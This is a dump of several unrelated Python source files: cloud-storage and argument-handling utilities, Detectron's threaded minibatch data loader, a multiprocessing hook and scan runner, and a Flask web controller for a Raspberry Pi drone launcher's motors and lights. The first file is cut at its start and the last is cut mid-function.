for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def sdb_to_dict(item):
attr = item['Attributes']
return {c['Name']: c['Value'] for c in attr}
def dict_to_b64str(the_dict):
bytes_dict = json.dumps(the_dict).encode()
b64_dict = base64.urlsafe_b64encode(bytes_dict)
return b64_dict.decode()
def b64str_to_dict(str_data):
b64_dict = base64.urlsafe_b64decode(str_data.encode())
bytes_dict = json.loads(b64_dict)
return bytes_dict
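# Round-trip example (assumed): b64str_to_dict(dict_to_b64str({'a': 1})) == {'a': 1}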
def bytes_to_b64str(byte_data):
byte_data_64 = base64.b64encode(byte_data)
byte_data_64_ascii = byte_data_64.decode('ascii')
return byte_data_64_ascii
def b64str_to_bytes(str_data):
str_ascii = str_data.encode('ascii')
byte_data = base64.b64decode(str_ascii)
return byte_data
def split_object_url(obj_url):
if '://' in obj_url:
sb, path = obj_url.split('://')
else:
sb = None
path = obj_url
sb = 'ibm_cos' if sb == 'cos' else sb
sb = 'aws_s3' if sb == 's3' else sb
bucket, full_key = path.split('/', 1) if '/' in path else (path, '')
if full_key.endswith('/'):
prefix = full_key.replace('/', '')
obj_name = ''
elif full_key:
prefix, obj_name = full_key.rsplit('/', 1) if '/' in full_key else ('', full_key)
else:
prefix = ''
obj_name = ''
return sb, bucket, prefix, obj_name
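# Illustrative examples (assumed URLs):
#   split_object_url('cos://my-bucket/data/file.csv') -> ('ibm_cos', 'my-bucket', 'data', 'file.csv')
#   split_object_url('s3://my-bucket/data/')          -> ('aws_s3', 'my-bucket', 'data', '')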
def split_path(path):
if (path.startswith("/")):
path = path[1:]
ind = path.find("/")
if (ind > 0):
bucket_name = path[:ind]
key = path[ind + 1:]
else:
bucket_name = path
key = None
return bucket_name, key
def format_data(iterdata, extra_args):
"""
Converts iterdata to a list with extra_args
"""
# Format iterdata in a proper way
if type(iterdata) in [range, set]:
data = list(iterdata)
elif type(iterdata) != list:
data = [iterdata]
else:
data = iterdata
if extra_args:
new_iterdata = []
for data_i in data:
if type(data_i) is tuple:
# multiple args
if type(extra_args) is not tuple:
raise Exception('extra_args must contain args in a tuple')
new_iterdata.append(data_i + extra_args)
elif type(data_i) is dict:
# kwargs
if type(extra_args) is not dict:
raise Exception('extra_args must contain kwargs in a dictionary')
data_i.update(extra_args)
new_iterdata.append(data_i)
else:
new_iterdata.append((data_i, *extra_args))
data = new_iterdata
return data
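# Illustrative example (assumed input): with iterdata=[1, 2] and extra_args=(10,),
# format_data returns [(1, 10), (2, 10)]; when the elements are dicts, extra_args
# must be a dict and is merged into each element as kwargs.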
def verify_args(func, iterdata, extra_args):
data = format_data(iterdata, extra_args)
# Verify parameters
non_verify_args = ['ibm_cos', 'swift', 'storage', 'id', 'rabbitmq']
func_sig = inspect.signature(func)
new_parameters = list()
for param in func_sig.parameters:
if param not in non_verify_args:
new_parameters.append(func_sig.parameters[param])
new_func_sig = func_sig.replace(parameters=new_parameters)
new_data = list()
for elem in data:
if type(elem) == dict:
if set(list(new_func_sig.parameters.keys())) <= set(elem):
new_data.append(elem)
else:
raise ValueError("Check the args names in the data. "
"You provided these args: {}, and "
"the args must be: {}".format(list(elem.keys()),
list(new_func_sig.parameters.keys())))
elif type(elem) in (list, tuple) and len(elem) == len(new_func_sig.parameters):
new_elem = dict(new_func_sig.bind(*list(elem)).arguments)
new_data.append(new_elem)
else:
# single value (string, integer, etc)
new_elem = dict(new_func_sig.bind(elem).arguments)
new_data.append(new_elem)
return new_data
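# Illustrative example (hypothetical function): for
#   def add(x, y): return x + y
# verify_args(add, [(1, 2), (3, 4)], None) returns
# [{'x': 1, 'y': 2}, {'x': 3, 'y': 4}], binding each tuple to the signature
# (reserved names such as 'storage' or 'ibm_cos' are excluded from the check).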
class WrappedStreamingBody:
"""
Wrap boto3's StreamingBody object to provide enough Python fileobj functionality,
and to discard data added by partitioner and cut lines.
from https://gist.github.com/debedb/2e5cbeb54e43f031eaf0
"""
def __init__(self, sb, size):
# The StreamingBody we're wrapping
self.sb = sb
# Initial position
self.pos = 0
# Size of the object
self.size = size
def tell(self):
# print("In tell()")
return self.pos
def read(self, n=None):
retval = self.sb.read(n)
if retval == "":
raise EOFError()
self.pos += len(retval)
return retval
def readline(self):
try:
retval = self.sb.readline()
except struct.error:
raise EOFError()
self.pos += len(retval)
return retval
def seek(self, offset, whence=0):
# print("Calling seek()")
retval = self.pos
if whence == 2:
if offset == 0:
retval = self.size
else:
raise Exception("Unsupported")
else:
if whence == 1:
offset = self.pos + offset
if offset > self.size:
retval = self.size
else:
retval = offset
# print("In seek(%s, %s): %s, size is %s" % (offset, whence, retval, self.size))
self.pos = retval
return retval
def __str__(self):
return "WrappedBody"
def __getattr__(self, attr):
# print("Calling %s" % attr)
if attr == 'tell':
return self.tell
elif attr == 'seek':
return self.seek
elif attr == 'read':
return self.read
elif attr == 'readline':
return self.readline
elif attr == '__str__':
return self.__str__
else:
return getattr(self.sb, attr)
class WrappedStreamingBodyPartition(WrappedStreamingBody):
def __init__(self, sb, size, byterange):
super().__init__(sb, size)
# Chunk size
self.chunk_size = size
# Range of the chunk
self.range = byterange
# The first chunk does not read an extra byte from a previous chunk (plusbytes == 0)
self.plusbytes = 0 if not self.range or self.range[0] == 0 else 1
# To store the first byte of this chunk, which actually is the last byte of previous chunk
self.first_byte = None
# Flag that indicates the end of the file
self.eof = False
def read(self, n=None):
if self.eof:
raise EOFError()
# Data always contains one byte from the previous chunk,
# so let's check whether it is a '\n' or not
if self.plusbytes != 0:
self.first_byte = self.sb.read(self.plusbytes)
retval = self.sb.read(n)
if retval == "":
raise EOFError()
self.pos += len(retval)
first_row_start_pos = 0
if self.first_byte != b'\n' and self.plusbytes == 1:
logger.info('Discarding first partial row')
# Previous byte is not \n
# This means that we have to discard first row because it is cut
first_row_start_pos = retval.find(b'\n')+1
last_row_end_pos = self.pos
# Find end of the line in threshold
if self.pos > self.chunk_size:
buf = io.BytesIO(retval[self.chunk_size-self.plusbytes:])
buf.readline()
last_row_end_pos = self.chunk_size-self.plusbytes+buf.tell()
self.eof = True
return retval[first_row_start_pos:last_row_end_pos]
def readline(self):
if self.eof:
raise EOFError()
if not self.first_byte and self.plusbytes != 0:
self.first_byte = self.sb.read(self.plusbytes)
if self.first_byte != b'\n':
logger.debug('Discarding first partial row')
self.sb._raw_stream.readline()
try:
retval = self.sb._raw_stream.readline()
except struct.error:
raise EOFError()
self.pos += len(retval)
if self.pos >= self.chunk_size:
self.eof = True
return retval
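# Note on the partition protocol above (worked example, assumed byte range): a
# chunk whose range starts at offset 0 has plusbytes == 0 and nothing is
# discarded; any later chunk first reads one extra leading byte that belongs to
# the previous chunk and, if that byte is not b'\n', skips its first (cut) row.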
|
loader.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import Queue
import signal
import threading
import time
import uuid
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
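# Minimal illustrative sketch (not part of Detectron) of the producer/consumer
# flow described in the module docstring: several loader threads put minibatch
# dicts onto a shared CPU queue, and consumer threads (one per GPU in the real
# loader) drain it. All names and sizes below are hypothetical.
def _loader_pattern_sketch(num_loaders=2, num_consumers=1, items_per_loader=4):
    shared_queue = Queue.Queue(maxsize=8)  # stands in for the minibatch queue

    def loader():
        # Producer: builds (fake) minibatches and puts them on the shared queue.
        for _ in range(items_per_loader):
            shared_queue.put({'data': np.zeros((1,), dtype=np.float32)})

    def consumer():
        # Consumer: pulls minibatches off the queue (the real loader would feed
        # the blobs into the workspace and enqueue them on a GPU BlobsQueue).
        for _ in range(num_loaders * items_per_loader // num_consumers):
            blobs = shared_queue.get()
            assert blobs['data'].dtype == np.float32

    threads = [threading.Thread(target=loader) for _ in range(num_loaders)]
    threads += [threading.Thread(target=consumer) for _ in range(num_consumers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
# (call _loader_pattern_sketch() to run the toy example)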
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multiple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize() == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
|
remote.py
|
# -*- coding: utf-8 -*-
# pylint: disable=import-error, no-name-in-module
import contextlib
import multiprocessing
import os
import queue
import signal
import time
import traceback
import warnings
from const import DUMP_PATH, HOOK_CPU, INTERVAL, QUEUE_DUMP, QUEUE_LOGS, SCAN_CPU
from scan import lookup, scan
try:
from sites import HOOK
except ImportError:
HOOK = list()
try:
from sites import EXIT
except ImportError:
EXIT = list()
###############################################################################
# join flags
JOIN_DUMP = multiprocessing.Value('B', False)
JOIN_LOGS = multiprocessing.Value('B', False)
def join_dump(*args, **kwargs): # pylint: disable=unused-argument
JOIN_DUMP.value = True
def join_logs(*args, **kwargs): # pylint: disable=unused-argument
JOIN_LOGS.value = True
# signal handling
signal.signal(signal.SIGUSR1, join_dump)
signal.signal(signal.SIGUSR2, join_logs)
###############################################################################
class HookWarning(Warning):
pass
def wrapper_logs(args):
func, log_name = args
return func(log_name)
def wrapper_func(func):
return func()
def hook(log_name):
if HOOK_CPU <= 1:
[func(log_name) for func in HOOK] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(HOOK_CPU).map(wrapper_logs, map(lambda func: (func, log_name), HOOK)) ## pylint: disable=map-builtin-not-iterating
def remote_logs(): # pylint: disable=inconsistent-return-statements
if len(HOOK) < 1:
return
while True:
try:
log_name = QUEUE_LOGS.get_nowait()
try:
hook(log_name)
except Exception:
traceback.print_exc()
warnings.warn(f'hook execution failed on {log_name!r}', HookWarning)
except queue.Empty:
if JOIN_DUMP.value:
break
time.sleep(INTERVAL)
if HOOK_CPU <= 1:
[func() for func in EXIT] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(HOOK_CPU).map(wrapper_func, EXIT)
def remote_dump():
max_list = SCAN_CPU ** 2
while True:
dump_list = list()
for _ in range(max_list):
try:
dump = QUEUE_DUMP.get_nowait()
dump_list.append(dump)
except queue.Empty:
break
if dump_list:
if SCAN_CPU <= 1:
[scan(dump) for dump in dump_list] # pylint: disable=expression-not-assigned
else:
multiprocessing.Pool(SCAN_CPU).map(scan, dump_list)
if JOIN_DUMP.value:
break
time.sleep(INTERVAL)
@contextlib.contextmanager
def remote_proc():
# check for remaining extracted files
[QUEUE_DUMP.put(file) for file in lookup(DUMP_PATH)] # pylint: disable=expression-not-assigned
# start main loop
proc_dump = multiprocessing.Process(target=remote_dump)
proc_logs = multiprocessing.Process(target=remote_logs)
proc_dump.start()
proc_logs.start()
try:
yield
except BaseException:
traceback.print_exc()
finally:
os.kill(proc_dump.pid, signal.SIGUSR1)
os.kill(proc_logs.pid, signal.SIGUSR2)
proc_dump.join()
proc_logs.join()
|
dronelauncher_python_final.py
|
#DRONE LAUNCHER
"""
ALL positional rotation is commented out until the rotation motor is customized adequately (no jerking).
Please be advised: the launcher is NOT connected. This means that any attempt to use functions involving the launch will
result in unwanted delays due to timed-out packet attempts.
Launcher use has been commented out to avoid 'bad orders' and therefore poor responses.
As the launcher motor and motor controller are set to be replaced, these 'Launcher' functions, as they are in this script,
will have to be retired anyway. The Flask route will probably make use of ctypes to reach the EPOS4 controller.
"""
#Import modules
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
try:
from neopixel import *
except ImportError:
print("Failure to load Neoplixels")
import argparse
##import threading
try:
import thermo
except IndexError:
print("Failure to find DS18B20")
try:
import MPU9250
except OSError:
print("Remote I/O Error - MPU 92/65")
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread, Event
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
try:
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
except NameError:
print("'Adafruit_Neopixel not defined - strip failed to set up'")
#Setup for the pins for threading the lights and the sound
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.OUT, initial = GPIO.LOW) #Sound
GPIO.setup(24, GPIO.OUT, initial = GPIO.LOW) #Lights
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
#time.sleep(wait_ms/1000.0) #This sleep is here in case we want a longer interval between each LED lighting up
#Function to thread the lights and the sound while the motor is moving
def relay_activate():
while True:
event.wait()
while event.is_set():
GPIO.output(24, GPIO.HIGH)
GPIO.output(23, GPIO.HIGH)
sleep(1)
GPIO.output(24, GPIO.LOW)
GPIO.output(23, GPIO.LOW)
try:
colorWipe(strip, Color(0, 255, 0))
except NameError:
print("Unable to set strip to red")
sleep(1)
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("Unable to set strip to white")
#Open serial port
#Linux comport name
rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
# rc = Roboclaw("COM8",115200)
rc.Open()
#Declare variables
#Specify IP address and port for the server
#Following 'host' assignment is redundant
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5000
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
address_3 = 0x82 #Controller 3, M1=Case Open, M2=Case Close
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees 0 -> 90 degrees (0 vertical, 90 horizontal)
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=65.0 #Pitch degrees for the launch (temporary) 0 is 90 -> 65 is 25
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127 - TEST BEFORE INCREASING SPEED -> 15 IS REASONABLE -> POTENTIAL RUNAWAY SPEED IF INCREASED
rotation_ready=5.0 #Rotation degrees for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting column
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
##lift_ready=lift_length #Lift length for the launch (temporary)
lift_ready = 20.0 #INDOOR testing extension. Comment out this line and use above line if outside.
launch_pulses=14098 #Encoder pulses from the launch motor - 106 cm
launch_length=106.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=15 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=7335 #Drone position during stand-by - 55 cm
launch_mount=16359 #Drone position during mounting - 123 cm
launch_break=20335 #Belt position during braking - 153 cm
launch_bottom=0 #Drone position at the back part of the capsule - 0 cm
launch_connect=0 #Belt position for touching the upper part - 16.5 cm // Changed to 0 but used to be 2190. Relevant in an older design.
encoders_ready = 0 #At the beginning, the encoders are not ready
#Create an instance of the Flask class for the web app
app = Flask(__name__)
app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web_test.html')
#Motor controller functions
try:
rc.ForwardM2(address, rotation_speed_manual)
rc.ForwardM2(address,0) #Both commands are used to avoid rotation
except AttributeError:
print("'Roboclaw' object has no attribute '_port' -> roboclaw connection issue")
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
event.set()
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
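# Worked example for the degrees-to-pulses conversion above (assumed request):
# with pitch_pulses=355000 and pitch_length=90.0, a requested pitch_position of
# 45 degrees maps to int(355000 / (90.0 / 45)) = 177500 encoder pulses.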
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
event.clear()
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
event.set()
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
event.set()
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
## encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
## rotation_position = request.form.get('rotation_position', type=int)
## if rotation_position > rotation_length or rotation_position < -rotation_length:
## return (''), 400
## elif rotation_position == 0:
## rotation_objective = 0
## else:
## rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## event.clear()
## return (''), 204
pass
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
event.clear()
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
event.set()
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
event.set()
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
event.set()
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
event.clear()
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
## event.set()
## rc.ForwardM2(address_2, launch_speed_manual)
## #rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
## return (''), 204
pass
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
## event.set()
## rc.BackwardM2(address_2, launch_speed_manual)
## #rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
## return (''), 204
pass
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
## launch_position = request.form.get('launch_position', type=int)
## if launch_position > launch_length or launch_position < 0:
## return (''), 400
## else:
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_2 = (0,0,0)
## while(buffer_2[2]!=0x80): #Loop until all movements are completed
## buffer_2 = rc.ReadBuffers(address_2)
##
## if launch_position == 0:
## launch_objective = 0
## else:
## launch_objective = int(launch_pulses/(launch_length/launch_position))
## launch_actual = rc.ReadEncM2(address_2)[1]
